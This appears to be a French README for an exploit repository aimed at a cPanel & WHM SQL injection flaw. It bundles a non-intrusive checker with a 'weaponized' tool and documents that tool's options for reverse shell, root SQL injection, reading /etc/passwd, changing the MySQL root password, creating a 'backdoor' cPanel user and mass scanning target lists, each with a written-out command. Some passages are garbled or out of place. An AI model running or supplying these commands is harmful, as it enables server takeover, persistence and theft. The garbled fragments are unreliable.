
👾 CVE-2026-58048 – Boîte à outils d'exécution SQL root cPanel (CVSS 9.4) | Suite complète Red/Blue Team Toolkit pour cPanel & WHM 11.x non corrigés. 2 outils : Safe Checker (audit/rapport), Weaponized (reverse shell, persistance, UDF RCE, déploiement, lecture/écriture de fichiers, opérations de base de données, scan de masse). Avec Python. 🦾 Utilisez-le de manière éthique, restez légal <3

⚠️ USAGE ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés exclusivement aux professionnels de la sécurité autorisés, aux blue teams et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu du CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et de lois similaires dans le monde entier.
CVE‑2026‑58048 est une vulnérabilité critique d'injection SQL dans les versions de cPanel & WHM qui permet à un utilisateur cPanel authentifié d'exécuter des commandes SQL arbitraires avec les via la fonctionnalité de renommage de base de données.
ANSI_QUOTES, ce qui modifie le comportement d'analyse syntaxique.11.137.1.6| Outil | Objectif | Utilisateur visé |
|---|---|---|
exploit.py | Boîte à outils complète et weaponisée avec reverse shell, persistance, RCE via UDF, lecture/écriture de fichiers, opérations sur bases de données, prise en charge de proxy et scan de masse. | Red teams / pentesters autorisés |
safecheck.py | Vérificateur de vulnérabilité non intrusif qui détecte la version de cPanel et évalue le risque sans exécuter de charge utile malveillante. Génère des rapports détaillés. | Blue teams / auditeurs de sécurité |
| Fonctionnalité | exploit.py | safecheck.py |
|---|---|---|
| Détection de vulnérabilité | ✅ | ✅ |
| Détection de version | ✅ | ✅ |
| Injection SQL root MySQL | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Persistance (création d'utilisateur cPanel) | ✅ | ❌ |
| RCE via UDF (exécution de commandes) | ✅ | ❌ |
| Lecture/écriture de fichiers | ✅ | ❌ |
| Opérations sur bases de données (SQL arbitraire) | ✅ | ❌ |
| Prise en charge de proxy | ✅ | ✅ |
| Scan de masse (multi‑thread) | ✅ | ❌ |
| Shell interactif | ✅ | ❌ |
| Mode non intrusif (sûr) | ❌ | ✅ |
| Mode verbeux/Débogage | ✅ | ✅ |
| Contrôle de vérification SSL | ✅ | ✅ |
| User‑Agent personnalisé | ✅ | ✅ |
| Délai entre requêtes / tentatives | ✅ | ❌ |
| Sortie JSON / rapport | ✅ | ✅ |
| Vérification d'accessibilité des endpoints | ❌ | ✅ |
| Détection de fuite du mode SQL | ❌ | ✅ |
| Scénario | Outil recommandé |
|---|---|
| Blue Team – vérifier si votre installation cPanel est vulnérable | safecheck.py |
| Audit de sécurité – évaluation de vulnérabilité non intrusive | safecheck.py |
| Red Team – test d'intrusion autorisé avec exploitation complète | exploit.py |
| Bug Bounty – test dans le cadre d'une divulgation responsable | safecheck.py |
| Scan de masse – vérification de multiples cibles pour la vulnérabilité | exploit.py (détection uniquement) |
| Réponse à incident – vérifier si des systèmes sont compromis | safecheck.py |
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt
requests
urllib3
colorama
pymysql
exploit.py| Paramètre | Description |
|---|---|
-t, --target | URL cPanel cible (ex. https://cpanel.example.com:2083) |
-l, --target-file | Fichier contenant la liste des cibles (une par ligne) pour le scan de masse |
-u, --mysql-user | Nom d'utilisateur cPanel/MySQL |
-P, --mysql-pass | Mot de passe cPanel/MySQL |
--mysql-port | Port MySQL (par défaut : 3306) |
-p, --port | Remplacer le port cPanel (par défaut depuis l'URL ou 2083) |
--threads | Nombre de threads pour le multi‑cibles (par défaut : 10) |
-o, --output | Enregistrer les résultats dans un fichier (cible unique) |
--log | Fichier journal pour une sortie détaillée |
-v, --verbose | Sortie verbeuse |
--proxy | Proxy HTTP/HTTPS (ex. http://127.0.0.1:8080) |
-ua, --user-agent | User‑Agent personnalisé |
--no-keep-alive | Ne pas maintenir la session active |
--delay | Délai entre les requêtes (par défaut : 2.0s) |
--max-retries | Nombre maximal de tentatives (par défaut : 3) |
--ssl-verify | Vérifier les certificats SSL |
--cmd | Commande à exécuter (préfixer par sql: ou udf: pour spécifier) |
--inject | SQL personnalisé à injecter (remplace les autres actions) |
--reverse-shell | IP:PORT du reverse shell (utilise UDF) |
--passwd | Changer le mot de passe root MySQL |
--adduser | Créer un utilisateur cPanel (USER DOMAIN PASSWORD) |
safecheck.py| Paramètre | Description |
|---|---|
-t, --target | URL cPanel cible (ex. https://cpanel.example.com:2083) |
-v, --verbose | Sortie verbeuse |
--proxy | Proxy HTTP/HTTPS (ex. http://127.0.0.1:8080) |
-ua, --user-agent | User‑Agent personnalisé |
--ssl-verify | Vérifier les certificats SSL |
--timeout | Délai d'attente des requêtes en secondes (par défaut : 10) |
--log | Enregistrer le rapport dans un fichier |
--json | Sortir les résultats au format JSON |
| # | Scénario | Commande |
|---|---|---|
| 1 | Vérification rapide de vulnérabilité | python safecheck.py -t https://cpanel.example.com:2083 |
| 2 | Scan détaillé avec rapport | python safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v |
| 3 | Reverse shell | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | Exécuter du SQL personnalisé (root) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'" |
| 5 | Lire un fichier sensible | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | Changer le mot de passe root MySQL | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | Créer un nouvel utilisateur cPanel (persistance) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Shell interactif après exploitation | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | Scan de masse depuis un fichier | python exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json |
| 10 | Utiliser un proxy et un User‑Agent personnalisé | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)" |
L'exploit utilise les endpoints UAPI cPanel suivants :
| Endpoint | Objectif |
|---|---|
/execute/Mysql/create_database | Créer une base de données temporaire |
/execute/Mysql/delete_database | Nettoyer les bases de données créées |
/execute/Mysql/rename_database | Endpoint vulnérable – déclenche l'injection SQL |
/execute/Version/get_version | Vérification de l'authentification et de la version |
/execute/UserManager/create_user | Créer un nouvel utilisateur cPanel (persistance) |
/execute/UserManager/list_users | Lister les utilisateurs existants |
Ce logiciel est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.
--read | Lire un fichier via LOAD_FILE |
-i, --interactive | Shell interactif après exploitation |
--verify | Vérifier le succès de l'exploit en tentant une connexion MySQL |
--ping | Ping la cible avant exploitation |